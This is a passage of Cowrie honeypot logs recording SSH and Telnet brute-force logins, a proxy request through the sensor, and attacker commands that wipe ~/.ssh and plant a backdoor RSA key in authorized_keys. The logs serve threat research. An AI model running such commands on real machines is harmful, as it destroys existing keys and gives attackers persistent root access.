ha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-09T01:06:03.859614Z","src_ip":"104.248.235.219","session":"e00e37dbddd1"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:06:03.861235Z","src_ip":"104.248.235.219","session":"e00e37dbddd1"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":56752,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d331eee4746","protocol":"ssh","message":"New connection: 5.202.105.236:56752 (1.2.3.4:22) [session: 3d331eee4746]","sensor":"my-vps","timestamp":"2025-09-09T01:06:54.170259Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:06:54.185075Z","src_ip":"5.202.105.236","session":"3d331eee4746"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:06:54.343168Z","src_ip":"5.202.105.236","session":"3d331eee4746"}
{"eventid":"cowrie.login.failed","username":"vladimir","password":"vladimir@123","message":"login attempt [vladimir/vladimir@123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:06:54.943511Z","src_ip":"5.202.105.236","session":"3d331eee4746"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:06:56.097544Z","src_ip":"5.202.105.236","session":"3d331eee4746"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37994,"dst_ip":"1.2.3.4","dst_port":23,"session":"458af6738bd1","protocol":"telnet","message":"New connection: 212.227.235.229:37994 (1.2.3.4:23) [session: 458af6738bd1]","sensor":"my-vps","timestamp":"2025-09-09T01:07:09.179586Z"}
{"eventid":"cowrie.session.connect","src_ip":"175.206.127.151","src_port":34665,"dst_ip":"1.2.3.4","dst_port":23,"session":"e76beb90f0c0","protocol":"telnet","message":"New connection: 175.206.127.151:34665 (1.2.3.4:23) [session: e76beb90f0c0]","sensor":"my-vps","timestamp":"2025-09-09T01:07:32.911390Z"}
{"eventid":"cowrie.session.closed","duration":31.398303270339966,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:07:40.577819Z","src_ip":"212.227.235.229","session":"458af6738bd1"}
{"eventid":"cowrie.session.closed","duration":39.01081681251526,"message":"Connection lost after 39 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:08:11.922137Z","src_ip":"175.206.127.151","session":"e76beb90f0c0"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":53986,"dst_ip":"1.2.3.4","dst_port":23,"session":"2e493b7d00d1","protocol":"telnet","message":"New connection: 176.65.149.186:53986 (1.2.3.4:23) [session: 2e493b7d00d1]","sensor":"my-vps","timestamp":"2025-09-09T01:12:17.403535Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:12:17.442747Z","src_ip":"176.65.149.186","session":"2e493b7d00d1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:12:17.463558Z","src_ip":"176.65.149.186","session":"2e493b7d00d1"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-09T01:12:17.464716Z","src_ip":"176.65.149.186","session":"2e493b7d00d1"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-09T01:12:17.465439Z","src_ip":"176.65.149.186","session":"2e493b7d00d1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59282,"dst_ip":"1.2.3.4","dst_port":22,"session":"55124975dc8b","protocol":"ssh","message":"New connection: 217.72.205.35:59282 (1.2.3.4:22) [session: 55124975dc8b]","sensor":"my-vps","timestamp":"2025-09-09T01:12:37.307386Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:12:37.308606Z","src_ip":"217.72.205.35","session":"55124975dc8b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6170,"dst_ip":"1.2.3.4","dst_port":22,"session":"665376615957","protocol":"ssh","message":"New connection: 212.227.125.160:6170 (1.2.3.4:22) [session: 665376615957]","sensor":"my-vps","timestamp":"2025-09-09T01:12:42.939948Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:12:42.941154Z","src_ip":"212.227.125.160","session":"665376615957"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6421,"dst_ip":"1.2.3.4","dst_port":22,"session":"01bc69c115b7","protocol":"ssh","message":"New connection: 212.227.125.160:6421 (1.2.3.4:22) [session: 01bc69c115b7]","sensor":"my-vps","timestamp":"2025-09-09T01:12:43.051375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T01:12:43.052249Z","src_ip":"212.227.125.160","session":"01bc69c115b7"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T01:12:43.164735Z","src_ip":"212.227.125.160","session":"01bc69c115b7"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:12:43.503466Z","src_ip":"212.227.125.160","session":"01bc69c115b7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T01:12:43.616537Z","session":"01bc69c115b7"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:13:53.052364Z","src_ip":"212.227.125.160","session":"01bc69c115b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46804,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b03877163d6","protocol":"ssh","message":"New connection: 212.227.235.229:46804 (1.2.3.4:22) [session: 5b03877163d6]","sensor":"my-vps","timestamp":"2025-09-09T01:15:09.632014Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:15:09.632858Z","src_ip":"212.227.235.229","session":"5b03877163d6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:15:09.717110Z","src_ip":"212.227.235.229","session":"5b03877163d6"}
{"eventid":"cowrie.login.success","username":"root","password":"Darya@1234567","message":"login attempt [root/Darya@1234567] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:15:10.095515Z","src_ip":"212.227.235.229","session":"5b03877163d6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:15:10.323824Z","src_ip":"212.227.235.229","session":"5b03877163d6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:15:10.324584Z","src_ip":"212.227.235.229","session":"5b03877163d6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:15:10.325306Z","src_ip":"212.227.235.229","session":"5b03877163d6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:15:10.410558Z","src_ip":"212.227.235.229","session":"5b03877163d6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:15:10.645620Z","src_ip":"212.227.235.229","session":"5b03877163d6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:15:10.646411Z","src_ip":"212.227.235.229","session":"5b03877163d6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:15:10.732791Z","src_ip":"212.227.235.229","session":"5b03877163d6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:15:10.733958Z","src_ip":"212.227.235.229","session":"5b03877163d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45522,"dst_ip":"1.2.3.4","dst_port":22,"session":"84ba24b81420","protocol":"ssh","message":"New connection: 212.227.235.229:45522 (1.2.3.4:22) [session: 84ba24b81420]","sensor":"my-vps","timestamp":"2025-09-09T01:15:10.815850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:15:10.816982Z","src_ip":"212.227.235.229","session":"84ba24b81420"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:15:10.901275Z","src_ip":"212.227.235.229","session":"84ba24b81420"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:15:11.278887Z","src_ip":"212.227.235.229","session":"84ba24b81420"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:15:12.365563Z","src_ip":"212.227.235.229","session":"84ba24b81420"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45530,"dst_ip":"1.2.3.4","dst_port":22,"session":"93d825728e0b","protocol":"ssh","message":"New connection: 212.227.235.229:45530 (1.2.3.4:22) [session: 93d825728e0b]","sensor":"my-vps","timestamp":"2025-09-09T01:15:12.448810Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:15:12.449580Z","src_ip":"212.227.235.229","session":"93d825728e0b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:15:12.533708Z","src_ip":"212.227.235.229","session":"93d825728e0b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:15:12.912080Z","src_ip":"212.227.235.229","session":"93d825728e0b"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:15:12.998341Z","src_ip":"212.227.235.229","session":"5b03877163d6"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:15:12.999425Z","src_ip":"212.227.235.229","session":"93d825728e0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:15:17.468895Z","src_ip":"176.65.149.186","session":"2e493b7d00d1"}
{"eventid":"cowrie.session.closed","duration":180.0703866481781,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:15:17.473813Z","src_ip":"176.65.149.186","session":"2e493b7d00d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37944,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbb9c17d8dc8","protocol":"ssh","message":"New connection: 212.227.235.229:37944 (1.2.3.4:22) [session: bbb9c17d8dc8]","sensor":"my-vps","timestamp":"2025-09-09T01:15:32.687617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:15:32.688662Z","src_ip":"212.227.235.229","session":"bbb9c17d8dc8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:15:32.964549Z","src_ip":"212.227.235.229","session":"bbb9c17d8dc8"}
{"eventid":"cowrie.login.success","username":"root","password":"qazwsxedcrfv","message":"login attempt [root/qazwsxedcrfv] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:15:34.110111Z","src_ip":"212.227.235.229","session":"bbb9c17d8dc8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:15:34.682260Z","src_ip":"212.227.235.229","session":"bbb9c17d8dc8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:15:34.683043Z","src_ip":"212.227.235.229","session":"bbb9c17d8dc8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:15:34.684212Z","src_ip":"212.227.235.229","session":"bbb9c17d8dc8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:15:34.961483Z","src_ip":"212.227.235.229","session":"bbb9c17d8dc8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:15:35.619892Z","src_ip":"212.227.235.229","session":"bbb9c17d8dc8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd 